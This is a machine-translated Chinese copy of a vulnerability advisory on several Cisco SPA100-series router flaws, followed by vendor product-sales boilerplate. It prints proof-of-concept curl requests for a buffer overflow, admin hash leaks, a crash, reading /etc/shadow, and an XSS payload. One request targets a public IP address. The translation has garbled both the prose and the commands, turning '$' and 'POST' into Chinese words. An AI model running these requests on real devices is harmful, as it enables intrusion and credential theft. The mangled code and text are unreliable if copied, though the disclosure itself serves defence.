脸谱网 Google + 推特 LinkedIn YouTube RSS 菜单 搜索 资源——博客 资源-网络研讨会 资源-报告 资源-事件 icons_066 icons_067 icons_068 icons_069 icons_070

思科SPA100系列多个漏洞

至关重要的

剧情简介

在思科SPA100系列站得住脚的发现多个漏洞。

cve - 2019 - 15240 - cve - 2019 - 15252:多个缓冲区溢出(远程代码执行)

多个缓冲区溢出漏洞(在堆栈和堆)可以通过触发的HTTP请求。一个身份验证的远程攻击者可能会利用这些执行代码。

概念验证

注意:这只是一种引发缓冲区溢出。

curl - i - s - k - x '后' \ - h美元的主持人:192.168.1.122 - h的内容长度:188美元- h的内容类型:应用程序/ x-www-form-urlencoded \美元,美元data-binary ' \ x0d \ x0asubmit_button = Remote_access&submit_type = del_remote&change_action = gozila_cgi&remove_id = Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A ' \ ' http://192.168.1.122/apply.cgi; session_id = f48ce7c27d0f652fd031191450819cbe的美元

我们也发表了一份充分利用GitHub PoC回购(https://github.com/tenable/poc/blob/master/cisco/spagett.py)。

cve - 2019 - 12708: Submit按钮任意ASP页面渲染管理员哈希泄漏特权升级

通过发送一个POST请求申请。cgi submit_button User_Level”的价值,一个经过验证的攻击者可能揭示了管理员的密码散列。管理散列将身体的反应,和这个值可以用来提升特权。

概念验证
curl - i - s - k - x '后' \ - h美元的主持人:50.71.132.182 - h的内容长度:49 - h美元的内容类型:应用程序/ x-www-form-urlencoded \——data-binary ' submit_button = User_Level&change_action = gozila_cgi ' \美元“http://50.71.132.182/apply.cgi; session_id = 8 bc7ff856b23540d2737e266b94640bd”

cve - 2019 - 15257:配置备份管理员哈希泄漏特权升级

通过执行一个HTTP GET /。cfg、NVRAM的编码复制配置将被归还。这是微不足道的解码,包括管理散列和思科哈希,你可以用它来登录。一个经过验证的攻击者可以利用这个升级特权。

cve - 2019 - 15258:添加最喜欢的帮助索引拒绝服务

一个身份验证请求发送申请。cgi的价值help_page但没有“help_idx”会导致崩溃。它导致httpd null指针。需要重启设备为了得到httpd再次运行。

概念验证
curl - i - s - k - x美元“POST”\“主持人:192.168.1.123”- h美元- h的内容类型:应用程序/ x-www-form-urlencoded - h的内容长度:93 \——data-binary美元' submit_button =帮助/ help&submit_type = fav_add&change_action = gozila_cgi&help_page = 1美元\ ' http://192.168.1.123/apply.cgi; session_id = a534c87e1fe5d0f49498cd9cbed1d4cd '

cve - 2019 - 12702: GUI操作反映了跨站脚本

的申请。cgi的gui_action POST参数值并不是之前验证在浏览器中反映其价值。经过身份验证的攻击者可能会利用这个注入并执行恶意客户端JavaScript。

概念验证
gui_action =, > <脚本> < img src = x onerror =警报(xss) > < /脚本> < !—

cve - 2019 - 12703:存储通过DHCP跨站点脚本

DHCP客户端(SPA122“互联网”的端口上运行,或唯一的港口SPA112)接受和显示Web UI的DHCP“域名”选项没有任何逃避或验证,导致XSS。恶意DHCP服务器可以使用这种偷管理员凭证,如果管理员登录和视图恶意DHCP服务器配置,其中包括Javascript在域名参数。XSS是通过访问触发状态>系统信息页面。

SPA122的DHCP服务器(SPA112没有此功能)将接受并显示在Web UI DHCP客户端主机名,导致XSS。攻击者可以利用这个通过发送DHCP客户端主机名。XSS可以通过访问触发状态> DHCP服务器的信息。

cve - 2019 - 12704:下一页任意文件披露

next_page参数值可以制作显示磁盘上的任意文件路径的内容。这可能是攻击者利用一个经过验证的。

注意:这个也可以用来提升特权通过阅读/ www / User_Level.asp。

的概念:
curl - i - s - k - x美元“POST”\“主持人:192.168.1.122”- h美元- h的内容类型:应用程序/ x-www-form-urlencoded - h的内容长度:81 \——data-binary美元' submit_button = hax&submit_type = hax&change_action = gozila_cgi&next_page = / etc /阴影' \ ' http://192.168.1.122/apply.cgi; session_id = 73320 cc2a9534cfeb0e6141f9ed52bb8美元

解决方案

升级到思科SPA100系列1.4.1 SR5固件版本。

披露时间表

07/09/2019——思科成立26日披露漏洞
07/12/2019——思科承认收到报告
07/26/2019——思科要求额外的信息复制18的漏洞
08/19/2019 - 18日成立提供额外的细节披露漏洞和消除2
08/19/2019——思科承认收到额外的细节
08/29/2019——思科设置一块计划10月16日的日期
08/29/2019 -思科请求额外的细节2漏洞。
08/30/2019——站得住脚的漏洞2日提供了额外的细节
10/01/2019——思科提供了19个漏洞cf
10/16/2019——站得住脚的发布协调咨询

交易报告内的所有信息提供了“是”,没有任何形式的保证,包括适销性的隐含保证和健身为特定目的,并没有保证的完整性、准确性、及时性。个人和组织负责评估任何实际或潜在的安全漏洞的影响。

站得住脚的非常重视产品安全。如果你认为你已经找到一个漏洞在一个我们的产品,我们要求您请与我们共同努力,快速解决它为了保护客户。站得住脚的相信迅速应对这样的报道,与研究人员保持沟通,并提供解决方案。

提交漏洞信息的更多细节,请参阅我们的漏洞报告指南页面。

如果你有问题或修正咨询,请电子邮件(电子邮件保护)

风险信息

成立咨询ID
- 2019 - 44
信贷

安德鲁•奥尔

亚历克斯·韦伯

CVSSv2基地/时间的分数
9.0
CVSSv2向量
AV: N /交流:L /非盟:S / C: C / I: C / A: C
更多关键字
CSCvq50494
CSCvq50520
CSCvq50523
CSCvq50529
受影响的产品
思科SPA100系列
风险因素
至关重要的

咨询时间

10/16/2019——咨询发布的
10/16/2019——咨询内容更新
10/16/2019——更新信贷
10/16/2019——更新信贷和标题
10/30/2019 -格式
10/31/2019——更新细节
缓冲区溢出利用11/08/2019——添加链接
11/12/2019——由于补丁发布更新的解决方案

站得住脚的脆弱性管理

以前Tenable.io


享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

站得住脚的脆弱性管理

以前Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试成立Nessus专业免费的

免费7天

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。

新成立Nessus专家
现在可用

Nessus专家增添了更多的功能,包括外部攻击表面扫描,和添加域和扫描云基础设施的能力。点击这里尝试Nessus专家。

填写下面的表格继续Nessus Pro的审判。

买站得住脚的Nessus专业

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。站得住脚的Nessus专业将帮助自动化漏洞扫描过程,节省时间在你的合规周期,让你与你的团队。

买一个多年的许可并保存。高级支持访问添加到手机、社区和聊天支持一天24小时,一年365天。

选择您的许可

买一个多年的许可并保存。

添加的支持和培训

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问我们的最新的web应用程序扫描提供专为现代应用程序的一部分的一个管理平台。安全扫描整个在线组合漏洞具有高精确度没有重体力工作或中断关键web应用程序。现在报名。

你站得住脚的Web应用程序扫描试验还包括站得住脚的脆弱性管理,成立Lumin站得住脚的云安全。

买站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

5 fqdn

3578美元

现在购买

尝试成立Lumin

可视化和探索你的风险管理,跟踪风险降低随着时间的推移和基准与站得住脚的Lumin你的同行。

你站得住脚的Lumin审判还包括站得住脚的脆弱性管理,站得住脚的Web应用程序扫描和站得住脚的云安全。

买站得住脚的Lumin

联系销售代表如何站得住脚的Lumin可以帮助你了解你的整个组织和管理网络的风险。

尝试站得住脚的云安全

以前Tenable.cs

享受完全访问检测和修复云基础设施配置错误和查看运行时的漏洞。现在注册你的免费试用。了解更多关于审判过程请点击这里。

你站得住脚的云安全试验还包括站得住脚的脆弱性管理,成立Lumin和站得住脚的Web应用程序扫描。

联系销售代表购买站得住脚的云安全

联系销售代表来了解更多关于站得住脚的云安全,看是多么容易机载云账户和获得可见性都几分钟内云配置错误和漏洞。

尝试成立Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经成立Nessus专业吗?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

尝试Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经有了Nessus专业?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

Baidu
map